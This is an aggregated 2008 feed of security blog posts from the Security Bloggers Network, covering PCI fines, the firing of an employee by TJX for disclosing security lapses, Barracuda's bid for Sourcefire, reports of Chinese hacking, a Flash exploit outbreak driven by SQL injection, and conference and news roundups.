Sunday, June 1, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Separation of duties is a tool, not a goal [Kees Leune]

Posted: 31 May 2008 09:27 PM CDT

Separation of duty is one of the most powerful tools an information security professional has. But that is exactly what it is: a tool; not a goal.

My family and I live in a very safe suburban neighborhood. The incorporated village has its own police force, and most of the village's budget is spent on it. Much to my surprise, we have been becoming more and more aware of suspicious activities in a house in our area; cars pull up at the strangest hours and leave again within 5 minutes. Usually someone walks over from the car to the house, a handshake is exchanged and the visiting party leaves. Sounds like there is some trade in "stuff" going on.

As with most people, we are not too happy that this is happening on our doorstep. We have repeatedly called the local police department and even had house visits by detectives who were trying to figure out, from our witness statements, what might be going on. The last house visit ended with the detectives reassuring us to call whenever.

Much to our chagrin, whenever we have been calling we cannot get past a dispatcher who knows nothing about the case and refuses to forward our calls to the detectives. Today was a new record; as we witnessed another exchange, we called the police department.

The response? "Sorry, the detectives do not work on Saturday. Please call back Monday after 9am to file your report."

Excuse me?!

It gets "funnier". This time, the car that pulled up was model streetracer; lots of engine revs and loud music. Our next-door neighboors also called dispatch to complain about the loud noises. Guess what? Within 5 minutes; three marked police cars show up on the scene to check out what was going on!

I understand that detectives do investigations; just like in information technology, it is the information security officer who does the investigation and the field support techs who do take the general calls. But please; separation of duty is a tool, not a goal. When the dispatcher choses to send three squad cars to a noise complaint, but none to an alleged drug deal, something is wrong in this world.

Satellite Hacker Tells All [Liquidmatrix Security Digest]

Posted: 31 May 2008 12:45 PM CDT

From Wired…

SAN DIEGO — Christopher Tarnovsky feels vindicated. The software engineer and former satellite-TV pirate has been on the hot seat for five years, accused of helping his former employer, a Rupert Murdoch company, sabotage a rival to gain the top spot in the global pay-TV wars.

But two weeks ago a jury in the civil lawsuit against that employer, NDS Group, largely cleared the company — and by extension Tarnovsky — of piracy, finding NDS guilty of only a single incident of stealing satellite signals, for which Dish was awarded $1,500 in damages.

“I knew this was going to come,” Tarnovsky says. “They didn’t have any proof or evidence.”

The trial was years in the making, yet raised more questions than it answered. It came down to testimony between admitted pirates on both sides who accused each other of lying. Now that it’s over Tarnovsky, who was fired by NDS last year, is eager to tell his side of the story.

Article Link

Tip of the hat to Adam for this one

Tags:

Chinese hackers…underachievers! Only responsible for 88% of attacks on Australian government websites. [The Dark Visitor]

Posted: 31 May 2008 08:47 AM CDT

Solid “B” work here guys and not trying to make you feel bad about you…but, making the “could have done better” face in your direction:

CHINESE computer hackers are responsible for 88 per cent of attacks on Australian government web sites, according to web security company TippingPoint.

Read why Chinese hackers can’t break that remaining 12%

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Look to the acquiring banks, not the PCI Security Council [Network Security Blog]

Posted: 31 May 2008 02:12 AM CDT

Alan is continuing the conversation about the firing at TJX and reporting Payment Card Industries ‘violations’ to someone. I want to pause the conversation for a moment to clear up a few misconceptions.

The PCI Security Council has no power to fine and is only responsible maintaining the PCI Data Security Standards and administrating the assessment process. They set the standards and keep track of who’s compliant (or not). That’s about it. They have a lot of power to influence the security industry. They have complete control over the assessment process. But what the PCI Security Standards Council does not have is a direct means to fine a company for not being compliant. There is almost no direct relationship between the PCI Council and the businesses taking credit cards.

The credit card companies never fines a merchant directly, since their relationship is with the acquiring bank, not the merchant. In simplest terms, acquiring bank takes the credit card information from the merchant and gives the merchant his money, minus a small fee. The acquiring bank, the PCI Council and the credit card companies all have direct relationships. Only the acquiring bank has a relationship with the merchant. The credit card companies can fine an acquiring bank, but don’t fine a merchant directly. Though that cost is usually passed through to the merchant in some form.

If a merchant suffers a compromise or is non-compliant, the acquiring has several punitive options, including raising the per transaction fee or levying a fine. Most merchant would rather receive a fine than raised fees; for medium and large businesses the fine would be much less painful than a .25% raise in their per transaction fees. .25% of several hundred million dollars is still a lot of money. The acquiring bank can also choose to absorb the loss.

The acquiring bank has the power to make a company hurt if they’re not compliant or suffer a compromise, the ‘teeth’ Alan’s looking for. There isn’t much direct evidence of how much the acquiring banks are fining companies and what we saw happen with the first TJX incident wasn’t inspiring. Visa fined the acquiring bank $880,000 which will likely be passed along in one form or another. But we, the public, don’t know the specifics of what TJX was fined because there is no reporting requirement. Even working in the industry, all I know of the fines is from the press.

The bottom line is, the PCI process has teeth. They’re being used quietly by the acquiring bank as part of the business processes. It’s a monetary issue from start to finish, there are no legal requirements. Would I like to know what the fines being levied against companies are? Yes, and I’d like to have enough information to understand the effectiveness of the PCI Standards. But there’s no fiscal incentive for any of the parties involved to disclose fine information to the public, so don’t expect to see it any time soon. Just because we don’t see the teeth doesn’t mean they’re not their though.

And as far as I can tell, there’s no way for the public to get in touch directly with the acquiring banks.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Leave Sourcefire Alone! [NP-Incomplete]

Posted: 31 May 2008 01:54 AM CDT


Barracuda
Originally uploaded by oybay
Apparently Barracuda, the SpamAssassin + ClamAV in a box company and perennial purchasers of godforsaken airport advertising space, is trying to eat SourceFire, the people who own ClamAV. I am debating making a Leave-Britney-Alone style video as a response. Trust me, no one wants to see that.*


* In interest of full disclosure, I do hold FIRE in my portfolio.

Bad marketing department! Bad! No bagel day! [NP-Incomplete]

Posted: 31 May 2008 01:38 AM CDT

Hoff had a post about a VirtSec startup known as Hyperbole. Their product/feature names include such gems as HyperTension, HyperSensitivity, and HyperVentilated.
...
All I can think is of some CSO three years from now muttering "I bought HyperTension and all I got was hypertension."

Links for 2008-05-30 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"]

Posted: 31 May 2008 12:00 AM CDT

physical access pwns you again...China +1 [Carnal0wnage Blog]

Posted: 30 May 2008 07:33 PM CDT

unconfirmed but completely believable:

"Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez.

Commerce Secretary Carlos Gutierrez's visit to China has raised security questions.

The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers.

The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended.

When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, "We take security seriously, and as we learn of concerns about security, we look into them."

This kind of stuff has been going on for years to businessmen, and who's to blame them if some jackass leaves a laptop unattended.

http://edition.cnn.com/2008/US/05/29/china.hackers/
http://www.thedarkvisitor.com/2008/05/lose-a-laptopget-hacked-sigh/
http://www.nationaljournal.com/njmagazine/cs_20080531_6948.php

Barracuda buying Sourcefire? When Hell(FIRE) freezes over! [Security Incite Rants]

Posted: 30 May 2008 11:08 AM CDT

Yesterday the folks from Barracuda announced an unsolicited takeover attempt of Sourcefire. They are proposing a 13% premium and think they can "fix" some of the execution problems that have plauged FIRE since they went public.

I'm sure the fish aren't laughing, but everyone else in the industry is. This deal isn't going to happen, not in it's current form anyway. Here are a couple of points that create serious headwind for the deal:

  1. Crappy premium - Barracuda is bottom fishing here. Yes, FIRE has had issues and there is a ton of uncertainty about their strategy and the CEO transition. But only a 13% premium. For that type of premium, large shareholders are better off just dumping their shares, rather than risk deal closure issues. Of course, I'm not investor, but 13% seems a bit weak.
  2. Deal financing - Barracuda is offering a cash deal and says it "doesn't expect any financing contingencies." Really? I guess they could raise some money, but for a private company to raise what would need to be over $200 million isn't something you see everyday and in this kind of debt environment wouldn't seem to be that easy.
  3. Distribution mismatch - Sourcefire makes their money from selling network security infrastructure to large enterprise and government institutions. Barracuda sells anti-spam boxes to everyone else. There really isn't a lot of leverage between the two models and if Barracuda wanted to get into the UTM business, there are a lot cheaper ways to go.
  4. Trend = Red Herring - Another big reason specified by Barracuda is that they can more effectively fight off litigation from Trend Micro over the AV gateway patent. Has Barracuda won their case yet? Oh yeah, not so much. So this is a Red Herring and just meant to sow more seeds of doubt about FIRE's existing management team.
  5. What about the main line of business? - Barracuda also says they can "fix" Sourcefire's issues. Really? How do they plan to do that, especially for only a 13% premium? This is not a credible statement. It would help to understand more about Barracuda's business for them to be able to justify that kind of statement. It's a cash deal - so they don't have to - but they should.

    I'm no fan of Sourcefire's strategy (or lack thereof), but unless I see something more compelling than buying a bunch of cheap boxes and putting Snort on them - I don't believe Drako and Co. would be any more successful at "fixing" Sourcefire than anyone else.

So Sourcefire was correct in rejecting the deal and not even sitting down. If Barracuda was serious, they would have proposed a much higher premium and had a more effectively communicated strategy for the combined entity. The could have taken a page from Microsoft (62% permium for Yahoo) and IBM (huge premium for Lotus back in the day) and proposed a number that would be hard to walk away from. They didn't.

But let's be clear - that's not what this deal was about.

This is another example of why Barracuda may be the most effectively marketed security company out there. For the cost of a press release and some legal fees, they are going to be the talk of the town, even if Howie Mandel is just saying "No Deal!" You have to figure that Barracuda is angling for a public offering in the near term (once the markets right themselves) and this is a great way to get some visibility with the investors that are likely to invest in their IPO.

A 13% premium is a joke. But as a PR and investor relations strategy, it's brilliant.

 

Event Planner: Gartner IT Security Summit [Liquidmatrix Security Digest]

Posted: 30 May 2008 09:53 AM CDT

In case there are any readers who might recognize me, you’ll be able to find me at the Gartner IT Security Summit next week (June 2 -3).

I’m hoping to learn something quadranty.

The Next Ten Years in Information Security
Despite rapidly advancing threats and new technology solutions, it’s relatively easy planning for the next year or two. But peering out 5-10 years is far more challenging. The Gartner IT Security Summit will provide insight and a vision of how things will evolve over the long term and provide road maps on how enterprises and solutions providers will get there.

Check my Twitter for updates on where I am and what’s good or bad.

Tags: , , ,

Security Briefing: May 30th [Liquidmatrix Security Digest]

Posted: 30 May 2008 09:29 AM CDT

newspapera.jpg

What a week - it’s like I’m swimming uphill both ways and it’s snowing. An extra large helping of news to make up for being late this morning. And hey - thanks to all of our new subscribers that joined us yesterday. Welcome!

Click here to subscribe to Liquidmatrix Security Digest!

And now, the news…

  1. The Attack that made Kevin Rose Cry - Revision3
  2. BBC NEWS | Science/Nature | Monkey’s brain controls robot arm Always mount a scratch monkey - seriously.
  3. Will your mobile squeal to the police? | The Register Will your mobile find a horse head in it’s bed?
  4. Download al Qaeda manuals from the DoJ, go to prison? | The Register Another pair of articles analyzing the somewhat chilling effect of doing research and finding yourself in jail… do we accept this as a society or not?
  5. The New Order: When reading is a crime | The Register
  6. Facebook mob trashes £4.4m Spanish villa | The Register Anyone else surprised that the girl didn’t claim it was hackers — and faintly reminiscent of the Craigslist “The contents of this house must go” issue.
  7. Bletchley Park and the decay of the museum buildings Plcurecuernxf - fcraq n craal ba gur ravtzn naq fnir gur jbeyq sebz Uvgyre ntnva - be gur npnqrzvp trgf vg.
  8. 22 French Hackers Arrested 22 SkriptKiddies singing the Jean Valjean lines from Les Miserables… the horror.
  9. USA 2008 : Briefings Schedule All your briefs belong to Jeff Moss
  10. Rands In Repose: We Travel in Tribes I’m sneaking this one in to see if you are paying attention - which Diamond Age phyle do you belong to?
  11. State of the Internet It’s all about the metrics baby.
  12. Red Curtain: An Unsung, Free Security Application Anyone willing to sing in the comments?
  13. Computer trained to read minds Neo sez - BLUE PILL, take the frakkin blue one!
  14. National Journal Magazine - Chinas Cyber-Militia Good catch Matt Franz - is this responsible journalism or just journalistic asshattery.
  15. Did Hackers Cause the 2003 Northeast Blackout? Umm, No | Threat Level from Wired.com And 27/b6 weighs in on the issue… with maybe a little more journalistic integrity.

Tags: , , , ,

I didn’t sign nothing (NDA) [Network Security Blog]

Posted: 30 May 2008 08:48 AM CDT

As Public Relations folks continue to embrace bloggers and treat us more like press, I get more and more press releases and opportunities to talk to the people at security companies. I enjoy getting this information and appreciate talking to these companies as an analyst/press. But I have to laugh sometimes when they pull stupid stunts, like putting the phrase ‘Under NDA’ in the middle of a presentation. If I didn’t sign any paperwork, the only thing obligating me to that Non-Disclosure Agreement is common courtesy, something PR people need to be very careful of expecting as they dip their toes in the blogosphere.

Something that PR people, as well as bloggers, are still figuring out is the exact nature of the relationship between the two groups. PR professionals are used to building relationships with reporters and knowing exactly who they’re talking to. With bloggers they don’t have that relationship, they don’t even necessarily know the name of the person they’re dealing with. On the flip side, most bloggers have no idea how to react to invitations and press releases from PR agencies. The reactions can range from completely ignoring PR to maliciously using the information provided. I suspect most of us lean towards the ‘ignore them and they’ll go away’ camp.

I used to ignore most press releases, but I started changing that recently. Blogging is about communication and learning, both of which are the exact thing PR people are trying to provide. I’ve started responding to some press releases, letting the PR folks know if I find their press releases relevant or not. I’m trying to build some of the same relationships ‘real’ reporters have and making PR aware of my interests is part of that.

But the relationship has to go both ways; PR folks need to communicate little things like the expectation of not releasing product information prior to the products release date. In this case, it’s not a big deal: the product will be out next Monday. But when I saw the NDA statement cleverly slipped into the presentation, part of me wanted to post about it right away just out of spite. Luckily the larger, more responsible part of me decided it’d be a poor treatment of the company.

Bloggers and PR folks have a lot of learning to do about one another. We have to understand that PR professionals have access to a lot of valuable information we might not be able to get elsewhere. PR professionals need to realize that bloggers are not reporters, we don’t have the background a reporter does and in many cases a quick flash of popularity and traffic is more important to us than a ‘relationship’ with a PR firm. If you want something to be under Non-Disclosure Agreement, ask up front if a blogger is willing to respect a verbal NDA. But don’t slip it into a slide in your presentation and expect it to be honored.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Who you gonna run to? [Network Security Blog]

Posted: 30 May 2008 12:59 AM CDT

Alan Shimel faults me for saying sometimes you just have to walk away, in reference to TJX firing Cryptic_Mauler (the upper/lower case stuff is too much for me to type again and again). Alan talks about illegal behavior, turning your employer in to the authorities, standing up for your morals to do what’s right. Of course, he ignores the fact that nothing TJX is being accused of is illegal; stupid, yes, but not illegal. And the fact is there’s no one to turn TJX in to, not in the government and certainly not at the PCI Security Council or the major credit card companies.

Cryptic_Mauler was in an untenable situation: his employer was practicing the worst sort of security, they didn’t want to change, there’s no one he could report them to. Alan wishes there were someone CM could have reported TJX’s woefully inadequate security practices to, but if such a entity exists, I’ve never heard of one. The best thing he could have done was report the problem to TJX’s acquiring bank, but unless you’re really into credit card processing, the chances are you’ve never even heard of an acquiring bank let alone have any idea of who to call.

I like Alan, but asking me why I didn’t list reporting TJX to the authorities as an option is like asking me when was the last time I spoke to the Easter Bunny! Neither one exists! (my kids don’t read this, so I can say that). It’s fine to talk about taking the high moral ground when you’re living in a fantasy world, but the reality I live in doesn’t have anyone Cryptic_Mauler could have gone to to report TJX. I really wish it did, I could have used them myself in the past.

And why doesn’t the PCI Security Council have some way of reporting offending companies? I’ll hazard a guess and say they’ve probably talked about establishing just such a capability and decided against it in the strongest possible way. After all, if they had a way for someone to report violations to, that’d make the Council responsible for acting on those reports. And that’s something they really, really don’t want. But that’s only a guess.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Lose a laptop…get hacked? Sigh… [The Dark Visitor]

Posted: 29 May 2008 10:33 PM CDT

Not sure if this even qualifies as a post but, whatevah:

Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez.

Commerce Secretary Carlos Gutierrez’s visit to China has raised security questions.

The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers.

The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended.

When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, “We take security seriously, and as we learn of concerns about security, we look into them.”

This does continue…

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Then it all went black…Chinese hackers shutting out the lights? [The Dark Visitor]

Posted: 29 May 2008 10:24 PM CDT

I have no words…

Hackers working on behalf of China’s People's Liberation Army have penetrated networks controlling electric power grids in the United States, computer security experts believe. And that may have precipitated a massive blackout on the east coast in 2003, as well as a blackout in Florida this year.

That’s just one blockbuster assertion in a long story full of them, from National Journal scoopster Shane Harris.

More here…

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Keynote Speakers for The Last Hope Announced [Liquidmatrix Security Digest]

Posted: 29 May 2008 08:46 PM CDT

Just a heads up — Liquidmatrix Security Digest will be at The Last Hope. There may even be some shwag available.

For Immediate Release

The very first of the speaker slots for The Last HOPE have been announced with many more to come next week. We have had more submissions than ever and will need to add an additional track in order to accommodate the best of them. What follows are some of the highlights to date.

- Steven Levy, author of Hackers: Heroes of the American Revolution and chief technology writer and a senior editor for Newsweek.

- Adam Savage, co-host of the popular TV show Mythbusters and “a maker of things.”

- Kevin Mitnick, “the world’s most dangerous hacker” in the eyes of the government and mass media, imprisoned for over five years, and now a successful computer security consultant.

- Jello Biafra, a tradition at the HOPE conferences, former lead singer of The Dead Kennedys and one of America’s most interesting social activists.

- Steven Rambam, private eye extraordinaire, who can find out anything about anybody and has always been willing to share his knowledge of privacy with the hacker community. (The FBI prevented his 2006 talk from being given by swooping in and arresting him moments earlier. The case against him was later found to have no merit.)

These five speakers are only the tip of the iceberg. By the time the dust settles, we expect to have over 100 presentations in four tracks. While time is now quite short, if you feel you have an amazing talk idea or panel suggestion, you can still email us at speakers@hope.net. We will try and schedule as many good talks as we can cram into the weekend.

The Last HOPE will take place from July 18-20, 2008 at the Hotel Pennsylvania in New York City.

To preregister, visit http://store.2600.com/lasthope.html
To submit a speaker proposal, email speakers@hope.net
To become a vendor, email vendors@hope.net
To volunteer to help us run the conference, email volunteers@hope.net
To visit the official Last HOPE website, go to http://www.hope.net

Contact: HOPE Staff +1 631 751 2600
hope@hope.net

… and since I’m temporarily in charge — shwag is only available to those who recognize me.

Tags: , ,

Security Brieflet (the late edition): May 29th [Liquidmatrix Security Digest]

Posted: 29 May 2008 06:57 PM CDT

A couple of interesting stories over the course of the day…

Comcast Defaced (for a short while)

I can’t say that I’m all that saddened… it is Comcast after all.

Banks don’t disclose all breaches

I’d love to argue this one, but I’ve known too many bankers.

Back with more Liquidmatrix Love in the morning folks, the night is young and I’ve got work-related documentation to produce.

Tags: ,

Disclosing in a public forum is not whistle blowing [Network Security Blog]

Posted: 29 May 2008 04:02 PM CDT

Last week TJX fired one of their employees for disclosing on ha.ckers.org that TJX is using blank passwords and other very insecure procedures. Posting in what he thought was an anonymous manner, CrYpTiC_MauleR was tracked down by management at TJX through his ISP, asked what he felt is wrong with the TJX network and fired. And as bad as I feel for him personally, I think TJX did the right thing.

Don’t get me wrong, I have very little sympathy for a company like TJX. They had one of the biggest credit card breaches in history, they’ve been put through the ringer and they still have the temerity to allow such bad practices as blank passwords and running servers as admin. I’m hoping TJX’s acquiring bank, PCI assessor and Visa/Mastercard get wind of these issues and call them on the carpet for it. But I don’t excuse the actions of Cryptic_Mauler.

I’ve read most of the thread on sla.cers.org, and this appears to be an issue of venting frustration, not whistle blowing. If Cryptic_Mauler was talking to federal investigators or maybe even a reporter, I might call it whistle blowing, but by disclosing it in a security forum, it was simply a way of pointing the finger at the stupidity of his employer. It’s not a case of full disclosure either, since that usually refers to
vulnerabilities in a product or OS, not poorly designed security
implementation by your employer. He had no expectation that this disclosure would somehow improve the situation at TJX, he just wanted someone else to know about the issue. And maybe hope that someone could embarrass TJX into changing.

We’ve all been in situations where we have employers doing stupid things. We do our best to communicate with management about the problems and hope they react appropriately. The problem is, our perception of ‘appropriately’ and management’s is often very different. What we see as a horrible security hole, they may see as another minor problem that would take major money to fix. Or just as something that they don’t want to think about right now.

There’s no reporting mechanism built into the Payment Card Industry standards. To the best of my knowledge, there’s no clear cut method to report a company that has bad practices to the credit card companies or the government at all. There’s not even a press person you can talk to about the issues with to bring it to public awareness. It’s frustrating because, despite their known issues, TJX is probably far from the worst offender and there needs to be a way to make these people sit up and take notice. But that’s no excuse for posting the issues with the TJX network in a public forum.

Cryptic_Mauler isn’t a security professional. He wasn’t even a part of the IT team. But he was an employee of the company and as such was held to certain expectations. Keeping internal company issues internal is one of those expectations. I don’t like how TJX is apparently handling their problems, I don’t like that they aren’t responding more positively to internal criticism, but I don’t see that they could have taken any other action in this circumstance.

I’ve had to resign from a job before because the company wasn’t being responsible in my opinion. I’ve seen companies in the past that shouldn’t be allowed to have computers let alone an ecommerce site. I’ve been at companies that I wondered how they stayed in business, not even considering their security concerns. But I always tried to react ethically and within the bounds of my moral obligations. I’ve learned that I can do what I can do and sometimes I have to walk away and let someone else deal with the problem. Public disclosure doesn’t fit in my world view of ethics and morality.

It’s frustrating dealing with a company that doesn’t want to change. It’s hard not having leverage to make the changes that you see need to be made. How you react to that frustration is up to you. Do you scream in public like Cryptic_Mauler, keep going until you find someone who can make the change or do you move on to another opportunity? I hope Cryptic_Mauler can find a new position somewhere else; I hope the limited notoriety this incident gives him will help him further his career. But I think he made a mistake in publicly disclosing TJX’s problems, one I hope doesn’t continue to haunt him.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

As if you needed more reasons to use NoScript: Flash [Network Security Blog]

Posted: 29 May 2008 09:50 AM CDT

I’ve made no secret of the fact that I’m a big fan of Firefox and the NoScript plugin. I don’t want anything running in my browser that I don’t explicitly approve of. And now with the big rise in sites compromised with the latest Flash exploits, there are more reasons than ever to use NoScript. I don’t use Flashblock myself, but it also comes highly recommended for dealing with this issue.

The interesting thing to me is that this attack is a combination of SQL injection against the servers and a payload containing the Flash exploit. If the compromised sites had made the effort to use good coding practices and checked for SQL injections, this wouldn’t be a big deal. Another alternative would have been a web application firewall. This is 2008, not 1998, SQL injection is low hanging fruit on the security tree and most of the sites compromised should have something in place to stop SQL injections. But they don’t, so we have a nice outbreak of Flash exploits.

Security Focus stated that there were approximately 20,000 compromised web pages as of Tuesday. That sounds like a lot until you figure out the math and realize that this may mean 2000 or less machines compromised, depending on the average number of pages per system. I guess 2000 doesn’t get the clicks nearly as well as 20,000 does.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Security Briefing: May 29th [Liquidmatrix Security Digest]

Posted: 29 May 2008 09:19 AM CDT

newspapera.jpg

Wheeeeee… I’d like to take this moment to again bitch and moan about how much work this is — I don’t know how Dave finds the time and I’m not a morning person and I feel really bad and I’ve been busy and I don’t have enough coffee and… yeah. I got nothin. Have a Rockin’ Thursday! Thanks to all of our new subscribers that joined us yesterday. Welcome!

Click here to subscribe to Liquidmatrix Security Digest!

And now, the news…

  1. MacOS X 10.5.3 - Big Updates, Update Now! or else the bad guys will pwn your iCal.
  2. Defacement or Failure in Containment? Play some Russian Roulette with me! don’t believe what you see… sometimes.
  3. Securiosis tells us when Whole Disk Encryption isn’t enough
  4. Canadian government ACTAs to shoot itself in the foot… again. How do you say “Chilling Effect” when you’re up to your ass in melting ice-caps and pissed off polar bears?
  5. Let a million Hackerchildren bloom - OLPC style baby
  6. Ask /. all about security theatre HA… I didn’t get Frist Psot!!!!11!!!!
  7. Totally wicked xkcd all about security holes xkcd is the userfriendly for the post-dot-bomb world

Tags: , , , ,

No comments: